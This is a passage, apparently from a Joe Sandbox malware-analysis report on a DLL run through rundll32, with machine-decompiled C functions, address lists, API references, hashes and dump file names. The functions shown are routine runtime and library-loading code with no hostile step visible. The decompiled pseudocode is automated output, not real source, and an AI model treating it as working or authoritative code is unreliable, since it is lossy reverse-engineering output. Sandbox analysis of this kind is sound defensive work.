										 *0x6ed1e128 = _t37;
										goto L13;
									}
								}
							} else {
								L7:
								_t80 = 0;
								if(_t35 != 1) {
									_t82 = _t35;
									L17:
									 *_t82 = 1;
									 *(_t82 + 4) = 0;
									L18:
									_t80 = _t82 + 4;
								}
								return _t80;
							}
						}
					}
				}
			}

0x6eccd000
0x6eccd000
0x6eccd000
0x6eccd001
0x6eccd008
0x6eccd023
0x6eccd029
0x6eccd02c
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccd00a
0x6eccd00b
0x6eccd014
0x6eccd02e
0x6eccd02e
0x6eccd031
0x6eccd033
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccd016
0x6eccd039
0x6eccd039
0x6eccd040
0x6eccd063
0x6eccd069
0x6eccd06b
0x00000000
0x00000000
0x00000000
0x00000000
0x6eccd042
0x6eccd043
0x6eccd04b
0x6eccd06d
0x6eccd06d
0x6eccd072
0x6eccd074
0x6eccd084
0x6eccd089
0x6eccd08e
0x6eccd090
0x00000000
0x6eccd092
0x6eccd092
0x6eccd098
0x6eccd09f
0x6eccd0a1
0x6eccd0a6
0x6eccd0a8
0x6eccd0af
0x6eccd0af
0x6eccd0b6
0x00000000
0x6eccd0b6
0x6eccd076
0x6eccd076
0x6eccd07b
0x6eccd07d
0x6eccd0d0
0x6eccd0da
0x6eccd0df
0x6eccd0e1
0x6eccd0e2
0x6eccd0e3
0x6eccd0e4
0x6eccd0e5
0x6eccd0e6
0x6eccd0e7
0x6eccd0e8
0x6eccd0e9
0x6eccd0ea
0x6eccd0eb
0x6eccd0ec
0x6eccd0ed
0x6eccd0ee
0x6eccd0ef
0x6eccd0f3
0x6eccd0f4
0x6eccd0f5
0x6eccd0f6
0x6eccd0f9
0x6eccd0fc
0x6eccd103
0x6eccd114
0x6eccd117
0x6eccd120
0x6eccd123
0x6eccd127
0x6eccd131
0x6eccd136
0x6eccd13a
0x6eccd144
0x6eccd149
0x6eccd14e
0x6eccd153
0x6eccd154
0x6eccd159
0x6eccd15c
0x6eccd15f
0x6eccd161
0x6eccd179
0x6eccd17b
0x6eccd17e
0x6eccd1ef
0x6eccd180
0x6eccd180
0x6eccd185
0x6eccd18b
0x6eccd193
0x6eccd195
0x6eccd198
0x6eccd19b
0x6eccd19e
0x6eccd1a2
0x6eccd1a4
0x6eccd1a6
0x6eccd1aa
0x6eccd1ac
0x6eccd1ac
0x6eccd1b8
0x6eccd1b8
0x6eccd1c8
0x6eccd1cd
0x6eccd1d7
0x6eccd1d7
0x00000000
0x6eccd163
0x6eccd163
0x6eccd166
0x6eccd1e3
0x6eccd1ea
0x6eccd168
0x6eccd168
0x6eccd172
0x6eccd1f9
0x6eccd1ff
0x6eccd1ff
0x6eccd1ff
0x6eccd166
0x6eccd20f
0x6eccd20f
0x6eccd211
0x6eccd21f
0x6eccd07f
0x6eccd07f
0x00000000
0x6eccd07f
0x6eccd07d
0x6eccd04d
0x6eccd04d
0x6eccd04d
0x6eccd052
0x6eccd054
0x6eccd0bc
0x6eccd0bc
0x6eccd0c2
0x6eccd0c9
0x6eccd0c9
0x6eccd0c9
0x6eccd0cf
0x6eccd0cf
0x6eccd04b
0x6eccd040
0x6eccd014

APIs

TlsGetValue.KERNEL32(00000000,00000001,6ECCC746), ref: 6ECCD00B
TlsGetValue.KERNEL32(00000000,00000001,6ECCC746), ref: 6ECCD023
TlsGetValue.KERNEL32(00000000), ref: 6ECCD043
TlsGetValue.KERNEL32(00000000), ref: 6ECCD063
GetProcessHeap.KERNEL32 ref: 6ECCD076
HeapAlloc.KERNEL32(00C40000,00000000,0000000C), ref: 6ECCD089
TlsSetValue.KERNEL32(00000000,00000000,00C40000,00000000,0000000C), ref: 6ECCD0B6

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: Value$Heap$AllocProcess
String ID:
API String ID: 3559649508-0
Opcode ID: 18060bd777f1ccaeab538743b3c772e69c15fd10ff61dd07404d6e426ba833e4
Instruction ID: 07e4577aae0da07f1c77ecb751ba8a1d9fde58591a074961584cfd4aeb67a329
Opcode Fuzzy Hash: 18060bd777f1ccaeab538743b3c772e69c15fd10ff61dd07404d6e426ba833e4
Instruction Fuzzy Hash: 8E11B770680601CBFB504FF9D864F963AE8AB82A41F000C58D926DB784FB36D847CF66

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE3571, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECE3571(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E6ECE4073(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E6ECE33C8(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E6ECE1F75(GetLastError());
									_t18 =  *((intOrPtr*)(E6ECE1FCF()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E6ECE3633(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6ECE1F75(GetLastError());
						_t18 =  *((intOrPtr*)(E6ECE1FCF()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E6ECE3633(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6ECE365A(_a8);
				return 0;
			}

0x6ece3577
0x6ece357c
0x6ece3593
0x6ece35c5
0x6ece35cf
0x6ece35e8
0x6ece35ee
0x6ece35fc
0x6ece3609
0x6ece3610
0x6ece3629
0x6ece362c
0x6ece3612
0x6ece3619
0x6ece3624
0x6ece3624
0x6ece362e
0x6ece362f
0x00000000
0x6ece362f
0x6ece35f3
0x6ece35fa
0x00000000
0x00000000
0x00000000
0x6ece35fa
0x6ece35d8
0x6ece35e3
0x00000000
0x6ece35e3
0x6ece3595
0x6ece359b
0x6ece35ae
0x6ece35b1
0x6ece35b3
0x6ece35b5
0x00000000
0x6ece35b5
0x6ece35a1
0x6ece35a8
0x00000000
0x00000000
0x00000000
0x6ece35a8
0x6ece3581
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6ECE358D

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: aedef4f38761ea9d63307bf54155e97077cf6481405e718b42f605c9ee3c4145
Instruction ID: 93c8ed8df4c4f4203999a8245977f1bf473fd50e12b87df584824f77785d6929
Opcode Fuzzy Hash: aedef4f38761ea9d63307bf54155e97077cf6481405e718b42f605c9ee3c4145
Instruction Fuzzy Hash: 3F218E71604205AFD7009FFEC84899E77BDFF813687014928E8158BA64FB30F81487A4

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE0422, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6ECE0422(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6ed1e568 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6ed160c8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6ECE1EF8(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6ece0429
0x6ece049d
0x6ece042e
0x6ece0430
0x6ece0437
0x6ece043b
0x6ece0444
0x6ece0453
0x6ece045c
0x6ece0460
0x6ece04a9
0x6ece04ab
0x6ece04af
0x6ece04b2
0x6ece04b2
0x6ece04b8
0x6ece04b8
0x6ece04a4
0x6ece04a8
0x6ece04a8
0x6ece0462
0x6ece046b
0x6ece0495
0x6ece0498
0x6ece049a
0x6ece049a
0x00000000
0x6ece049a
0x6ece046d
0x6ece0478
0x6ece047d
0x6ece0482
0x00000000
0x00000000
0x6ece0489
0x6ece048f
0x6ece0493
0x00000000
0x00000000
0x00000000
0x6ece0493
0x6ece0440
0x00000000
0x00000000
0x00000000
0x6ece0442
0x6ece04a2
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6ECE04E3,00000000,?,00000001,00000000,?,6ECE055A,00000001,FlsFree,6ED16184,FlsFree,00000000), ref: 6ECE04B2

Strings

api-ms-, xrefs: 6ECE0472

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: fcd6753d4040e68235a66d255fcc70f57ec032127546dfdd0fe5f3bf12637093
Instruction ID: dff8ad5984687c55cd77566979fa44ac94137c236bbdf0d388c56776a2affb6d
Opcode Fuzzy Hash: fcd6753d4040e68235a66d255fcc70f57ec032127546dfdd0fe5f3bf12637093
Instruction Fuzzy Hash: 0111CA31A44B25AFDF528BA98D4674D37B4AF42770F114120FD25EBA84FB70ED0186D5

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE12ED, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E6ECE12ED(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x6ed1d804; // 0x15bff9f6
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E6ECE9B33, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x6ecea154(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x6ece1302
0x6ece130d
0x6ece1313
0x6ece1317
0x6ece1322
0x6ece132a
0x6ece1334
0x6ece133a
0x6ece133e
0x6ece1345
0x6ece134b
0x6ece134b
0x6ece133e
0x6ece1351
0x6ece1356
0x6ece1356
0x6ece135f
0x6ece1369

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,15BFF9F6,00000000,?,00000000,6ECE9B33,000000FF,?,6ECE127D,?,?,6ECE1251,?), ref: 6ECE1322
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6ECE1334
FreeLibrary.KERNEL32(00000000,?,00000000,6ECE9B33,000000FF,?,6ECE127D,?,?,6ECE1251,?), ref: 6ECE1356

Strings

CorExitProcess, xrefs: 6ECE132C
mscoree.dll, xrefs: 6ECE131B

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 02e43d48bc0ec79aec2e440577bd7dae8adb0c72c7be6630dd7f7ac87706b73d
Instruction ID: 91041e7b39ccd2fec03857f12925a0612fdeefeea3e44560961bdbb2a97ba789
Opcode Fuzzy Hash: 02e43d48bc0ec79aec2e440577bd7dae8adb0c72c7be6630dd7f7ac87706b73d
Instruction Fuzzy Hash: B101A232904959EFDF018F94CD05FBEBBB8FB44711F004525F822A2B80DB749904CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC2C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECCC2C0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtWaitForKeyedEvent");
				}
			}

0x6eccc2c5
0x6eccc2cd
0x6eccc2dc
0x6eccc2cf
0x6eccc2db
0x6eccc2db

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ECCC2C5
GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6ECCC2D5

Strings

NtWaitForKeyedEvent, xrefs: 6ECCC2CF
ntdll, xrefs: 6ECCC2C0

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NtWaitForKeyedEvent$ntdll
API String ID: 1646373207-2815205136
Opcode ID: 64a3cc9e4df8924193b2efc21b7a722321ee51fd20100893eb4bd02a40518f87
Instruction ID: f6b72932969f561c9df40df06526e722c1568861f56740eb0836fc6f236bb9f5
Opcode Fuzzy Hash: 64a3cc9e4df8924193b2efc21b7a722321ee51fd20100893eb4bd02a40518f87
Instruction Fuzzy Hash: 61B092B1E087026EAE907BF15B0CAA63A38A9E16913410480A027D9100EA248014D962

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC2E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECCC2E0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtReleaseKeyedEvent");
				}
			}

0x6eccc2e5
0x6eccc2ed
0x6eccc2fc
0x6eccc2ef
0x6eccc2fb
0x6eccc2fb

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ECCC2E5
GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6ECCC2F5

Strings

ntdll, xrefs: 6ECCC2E0
NtReleaseKeyedEvent, xrefs: 6ECCC2EF

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NtReleaseKeyedEvent$ntdll
API String ID: 1646373207-31681898
Opcode ID: 9957c5e063760ce3f01f47381a15c46ab6c2441e77f304b53e51a86ef295be60
Instruction ID: afd82babb80a2703b01a8c554145b097656ff8386a914fcc0796e65b64e7b599
Opcode Fuzzy Hash: 9957c5e063760ce3f01f47381a15c46ab6c2441e77f304b53e51a86ef295be60
Instruction Fuzzy Hash: 40B092B1E086066AAE607BF15B0CAA63938A9D16823010440A033E9104FA248014D922

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC280, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECCC280() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "SetThreadDescription");
				}
			}

0x6eccc285
0x6eccc28d
0x6eccc29c
0x6eccc28f
0x6eccc29b
0x6eccc29b

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6ECCC285
GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6ECCC295

Strings

kernel32, xrefs: 6ECCC280
SetThreadDescription, xrefs: 6ECCC28F

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: 118311e46f3e5081e81fb2c7de4722d3df894f26bafca0506f7c9a26365bf5e9
Instruction ID: 4dd702a268873f153415186dece9ae5da4bbe84d04284eaaca022725816d21ad
Opcode Fuzzy Hash: 118311e46f3e5081e81fb2c7de4722d3df894f26bafca0506f7c9a26365bf5e9
Instruction Fuzzy Hash: 9DB092B1E486026FAE607FF15A2CAA63A38A9D56C13010440F027D9101EA348014E972

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC260, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECCC260() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "GetSystemTimePreciseAsFileTime");
				}
			}

0x6eccc265
0x6eccc26d
0x6eccc27c
0x6eccc26f
0x6eccc27b
0x6eccc27b

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6ECCC265
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6ECCC275

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6ECCC26F
kernel32, xrefs: 6ECCC260

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32
API String ID: 1646373207-392834919
Opcode ID: c17f9a06ba9e75336f6acc6b4569ced744d34e5d422979629225f15f9c57d7fd
Instruction ID: 5b57f5a34bbdb7e81e078fc8f4ae00d5f8788029c5d663db26797f1d27d5129d
Opcode Fuzzy Hash: c17f9a06ba9e75336f6acc6b4569ced744d34e5d422979629225f15f9c57d7fd
Instruction Fuzzy Hash: 9DB092B1E086016BAE607FF19B5CAA63938A9D66813024840F123D9104EA24C064EA22

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC300, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECCC300() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtCreateKeyedEvent");
				}
			}

0x6eccc305
0x6eccc30d
0x6eccc31c
0x6eccc30f
0x6eccc31b
0x6eccc31b

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ECCC305
GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6ECCC315

Strings

NtCreateKeyedEvent, xrefs: 6ECCC30F
ntdll, xrefs: 6ECCC300

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NtCreateKeyedEvent$ntdll
API String ID: 1646373207-1373576770
Opcode ID: 6974c76fa4d607e59086c8f2659021f2519dbf61f5c4641ffc79a23e1ec552c9
Instruction ID: 6d4da3ee1f8e06a22a7ad5b38123f3f21ae9d6717abd51a70e8e9d76981c717f
Opcode Fuzzy Hash: 6974c76fa4d607e59086c8f2659021f2519dbf61f5c4641ffc79a23e1ec552c9
Instruction Fuzzy Hash: A6B092B1E086016EAE50BBF16B0CAE63938A9E16C23414440A033E9206EA248015D922

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE6749, Relevance: 6.3, APIs: 4, Instructions: 338
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E6ECE6749(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(E6ECE9B8A);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x6ed1d804; // 0x15bff9f6
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x6ed1e940 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E6ECE1E20(_t265, _t291, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x6ed1e940 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x6ed1e940 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x6ed1e940 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E6ECE50E3(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
